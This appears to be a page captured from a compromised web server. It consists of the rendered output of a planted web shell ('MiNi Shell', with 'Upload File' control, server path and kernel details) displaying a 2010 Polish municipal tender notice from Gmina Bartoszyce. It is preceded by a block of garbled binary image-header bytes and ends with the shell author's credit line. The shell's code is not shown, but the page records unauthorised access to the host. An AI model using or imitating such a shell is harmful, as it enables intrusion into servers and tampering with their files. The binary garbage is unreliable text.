JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/3465-N-2010.html

<p class="kh_header"><b>Bartoszyce: Sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania    przestrzennego Gminy Bartoszyce</b><br>
<b>Numer ogłoszenia: 3465 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Bartoszyce , Plac Zwycięstwa 2, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 089 762 77 00, faks 089 762 77 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bartoszyce.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania    przestrzennego Gminy Bartoszyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest wykonanie zmiany studium uwarunkowań i kierunków 	zagospodarowania przestrzennego Gminy Bartoszyce, zgodnie z Uchwałą  Nr XXXII/223/2009 	Rady Gminy w Bartoszycach z dnia 12 lutego 2009r. w sprawie 	przystąpienia do sporządzenia 	zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Bartoszyce. W 	Gminie zamieszkiwało 11 tysięcy 224 osoby na koniec 2008r. Obszar opracowania w pełnym 	zakresie merytorycznym obejmuje całą Gminę Bartoszyce o powierzchni 427,82 km2. 	Opracowanie musi uwzględniać wszystkie uwarunkowania, o których jest mowa w art. 	10 ust. 1 i 2 	ustawy o planowaniu i zagospodarowaniu przestrzennym.
	2) Opracowanie graficzne należy sporządzić w skali 1:25 000. 
	3)  Przedmiot zamówienia musi być sporządzony zgodnie z obowiązującymi przepisami 	     	     prawa oraz w formie i zakresie wymaganym przez organ nadzoru prawnego.
	4) pracowanie musi zawierać wszystkie wymagane przepisami prawa elementy, a w szczególności:
4.1. projekt uchwały wraz z załącznikami wg wzoru uzgodnionego z Zamawiającym, w formie kolorowej w wersji tradycyjnej oraz w wersji cyfrowej w formacie źródłowym w formie cyfrowej bazy danych w ilości egzemplarzy i formie określonej szczegółowo w § 3 umowy stanowiącej załącznik nr 2 do SIWZ, 
4.2. dokumentację formalno - prawną prac planistycznych zgodnie z art. 12, ust 2 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz § 9 rozporządzenia Ministra Infrastruktury z dnia 28.04.2004r.  sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego (Dz. U. Nr 118, poz. 1233),		
4.3 prognozę oddziaływania na środowisko - zgodnie z ustawą z dnia 03.10.2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie 	środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227).
4.4 przygotowanie opracowania ekofizjograficznego, o którym mowa w art. 72 ust. 4 ustawy z 27 kwietnia 2001r. Prawo ochrony środowiska (Dz. U. Z 2008r., poz. 150 z póź. zm.),
4.5. zamówienie obejmuje również udział Wykonawcy w prezentowaniu projektu studium Wójtowi Gminy Bartoszyce przed skierowaniem do opiniowania, w czasie dyskusji publicznej 	oraz w trakcie konsultacji i rozstrzygnięć dotyczących złożonych uwag. Zakres czynności procedury planistycznej należących do Zamawiającego i Wykonawcy został szczegółowo określony w harmonogramie rzeczowo - terminowym stanowiącym załącznik nr 1 do wzoru umowy.
5) Wykonawca odpowiada za poprawność i zgodność z przepisami sporządzonego projektu zmiany studium i dokumentacji prac planistycznych.
6) Za wadę przedmiotu zamówienia rozumie się w szczególności uznanie przez organ nadzorczy uchwały Rady Gminy w sprawie zmiany studium lub rozstrzygnięć będących ich załącznikami za sprzeczną z prawem lub naruszającą prawo. Wykonawca zobowiązany jest doprowadzić  plan do zgodności z przepisami w terminie ustalonym przez Zamawiającego w ramach ustalonego wynagrodzenia.
7) Wykonawca działa w imieniu Zamawiającego i jest zobowiązany do wykonania wszelkich czynności niezbędnych do prawidłowego i kompletnego przeprowadzenia procedury wynikającej z art.11 oraz art. 12 ust. 2 Ustawy o planowaniu i zagospodarowaniu przestrzennym, oraz innych 	przepisów prawa, jak również innych czynności nie określonych w w/w przepisach, jakie mogą wyniknąć podczas przeprowadzania procedury.
8)  W szczególności Wykonawca jest zobowiązany do:
8.1. przygotowania ogłoszenia do prasy miejscowej oraz obwieszczenia o podjęciu uchwały o przystąpieniu do sporządzania studium, określając formę, miejsce i termin  składania wniosków 	dotyczących studium, nie krótszy jednak niż 21 dni od dnia  ogłoszenia;
8.2. przygotowania zawiadomienia na piśmie o podjęciu uchwały o przystąpieniu do sporządzania zmiany studium dla instytucji i organów właściwych do uzgadniania i opiniowania projektu studium;
8.3. rozpatrzenia wniosków, o których mowa w pkt 8.1.
8.4. sporządzenia projektu zmiany studium, uwzględniając ustalenia planu zagospodarowania 	przestrzennego województwa; w przypadku braku planu zagospodarowania przestrzennego województwa lub nie wprowadzenia do planu zagospodarowania przestrzennego województwa zadań rządowych, uwzględnienia ustalenia programów, o których mowa w art. 48 ust. 1 Ustawy o planowaniu i zagospodarowaniu przestrzennym.
8.5. uzyskania od gminnej - w rozumieniu art. 8 Ustawy o planowaniu i 	zagospodarowaniu 	przestrzennym - komisji urbanistyczno-architekonicznej opinii o projekcie zmiany studium;
8.6.  uzgodnienia projektu zmiany studium z zarządem województwa w zakresie jego zgodności z ustaleniami planu zagospodarowania przestrzennego województwa;
8.7. uzgodnienia projektu zmiany studium z wojewodą w zakresie jego zgodności 
z ustaleniami programów, o których mowa w art. 48 ust. 1 Ustawy o planowaniu i zagospodarowaniu przestrzennym
8.8. wystąpienia o opinie dotyczące rozwiązań przyjętych w projekcie zmiany studium do:
    a)    starosty powiatowego,
    b)    gmin sąsiednich,
    c)    właściwego wojewódzkiego konserwatora zabytków,
    d)    właściwych organów wojskowych, ochrony granic oraz bezpieczeństwa     
                       państwa,
    e)    właściwego organu administracji geologicznej,
    f)    dyrektora regionalnego zarządu gospodarki wodnej w zakresie 
           zagospodarowania obszarów narażonych na niebezpieczeństwo powodzi;
    g)   innych organów i instytucji właściwych do opiniowania projektu zmiany 
                      studium
8.9. wprowadzenia zmian wynikających z uzyskanych opinii i dokonanych uzgodnień;
8.10. przygotowania ogłoszenia, w sposób określony w pkt 4.3.1, o. wyłożeniu projektu zmiany 	studium do publicznego wglądu z jednoczesnym określeniem terminu, w którym osoby prawne i fizyczne oraz jednostki organizacyjne będą mogły wnieść uwagi dotyczące projektu zmiany studium w czasie nie krótszym niż 21 dni od dnia zakończenia wyłożenia projektu 	zmiany studium. Ustalenie w/w terminów po dokonaniu uzgodnień z Zamawiającym,
8.11. uczestniczenia, przeprowadzenia i pełnej obsługi wyłożenia projektu zmiany studium do publicznego wglądu w okresie co najmniej 30 dni. Obsługa wyłożenia powinna zapewniać sprawne przeprowadzenie tego etapu procedury - codziennie przez minimum 2 godziny przez odpowiednią ilość osób ze strony wykonawcy (min. 2 osoby), 
8.12. przygotowania kompletu  materiałów dla Wójta w celu przedstawienia Radzie Gminy do uchwalenia projektu zmiany studium wraz z listą nieuwzględnionych uwag, 
8.13. udział w posiedzeniach Komisji i Sesjach Rady oraz innych spotkaniach, których konieczność wyniknie w trakcie procedury..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1) Oferta musi być zabezpieczona wadium w wysokości: 3000 zł
	     (słownie: trzy tysiące złoty ).
	2) Wadium wnosi się przed upływem terminu składania ofert.
	3) Wadium może być wniesione w następujących formach:
		a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.Nr 109, poz. 1158, z późn.zm.)
4) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany niżej: 
		43 1160 2202 0000 0000 6190 9989
	5) Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6) O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie decyduje data i godzina wpływu środków.
7) Wykonawca, który nie wniesie wadium, zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego.
8) Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza jeżeli w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25  w/w ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10) Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
	11)  Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana 	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 		w ofercie, a także nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po 	stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: na podstawie art. 22 
ust. 1  Ustawy Prawo zamówień publicznych spełniają warunki dotyczące:

		a) posiadania uprawnień do wykonywania określonej działalności lub czynności 			jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b) posiadania  wiedzy i doświadczenia, oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
c) sytuacji ekonomicznej i finansowej. 

	2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na 	podstawie art. 24 ust. 1 i 2 Ustawy Prawo zamówień publicznych.
	3) Spełnieniem warunku określonego w pkt. 1 ppkt. /a/ jest brak przesłanek zawartych w art. 24 ust. 	1 i 2 ustawy Prawo zamówień publicznych.
4) Spełnieniem warunku określonego w ppkt. /b/ jest wykonanie co najmniej 1 projektu 	studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz  dysponowanie co 	najmniej jedną osobą  z wymaganymi uprawnieniami do projektowania wraz z 	przynależnością do 	okręgowej izby architektów lub urbanistów.
5)Spełnieniem warunku określonego w ppkt. /c/ jest posiadanie środków finansowych w wysokości 	co najmniej równej sumie oferowanych kwot należnych za wykonanie projektu dla pierwszego i 	drugiego etapu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Zamawiający, w celu potwierdzenia przez Wykonawcę do wykonywania określonej działalności lub czynności oraz, że nie podlega wykluczeniu, na podstawie art. 24 Ustawy Prawo zamówień publicznych, żąda następujących dokumentów:

a) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

	2) W celu potwierdzenia posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz 	dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 	Zamawiający żąda następujących dokumentów:
		
		a) wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia 			postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w 			tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym 			przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i 				odbiorców, oraz załączenia dokumentów potwierdzających, że dostawy lub usługi 			zostały wykonane należycie,
		b) wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 			uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich 				kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do 				wykonania zamówienia, a także zakresu wykonywanych przez nich czynności,
		c) pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do 			wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. /b/, Wykonawca 			wykazał osoby, którymi będzie dysponował,
		d) stwierdzających, że osoby o których mowa w ppkt. /b/ posiadają wymagane 			uprawnienia tj. aktualne zaświadczenie o wpisie na listę członków właściwej izby 			samorządu zawodowego.
	
3)W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów:

	a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których 	Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 	finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 	miesiące przed upływem składania ofert,
	b) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
	
4) Wykonawca obowiązany jest dostarczyć oświadczenie wynikające z art. 24 i 22  ustawy Prawo
 zamówień publicznych.	
5) W przypadku gdy Wykonawcę będzie reprezentował pełnomocnik, należy dołączyć pełnomocnictwo, z którego będzie wynikał zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.
6) W przypadku, gdy część przedmiotu zamówienia będzie powierzone podwykonawcom
lub w razie ich braku należy dołączyć oświadczenie o korzystaniu lub nie korzystaniu z
 podwykonawców.
7) W przypadku gdy o wykonanie zamówienia będzie się starało dwóch lub więcej Wykonawców (oferta wspólna), Zamawiający żąda dokumentu do zobowiązania się przez jednego z Wykonawców do podpisania w/w dokumentu, który musi być upoważniony przez pozostałych.
8) Wszystkie wymagane dokumenty powinny być złożone w formie oryginałów bądź kopii poświadczonych za zgodność z oryginałem.
9) Brak jakiegokolwiek z w/w dokumentów lub złożenie dokumentu w niewłaściwej formie spowoduje konieczność wezwania Wykonawcy do ich uzupełnienia w wyznaczonym terminie.
10) Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 Ustawy Prawo zamówień publicznych, lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy, do ich uzupełnienia w  wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert ma podstawie art. 26 ust. 3 Ustawy Prawo zamówień publicznych.
11. Wszystkie ujawnione dane osobowe podlegają ochronie prawnej i mogą być 	wykorzystane tylko i wyłącznie do czynności związanych z niniejszym postępowaniem oraz 	realizacją umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bartoszyce-ug.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Bartoszycach
ul. Plac Zwycięstwa 2
11-200 Bartoszyce.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2010 godzina 10:00, miejsce: Urząd Gminy w Bartoszycach
ul. Plac Zwycięstwa 2
11-200 Bartoszyce.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com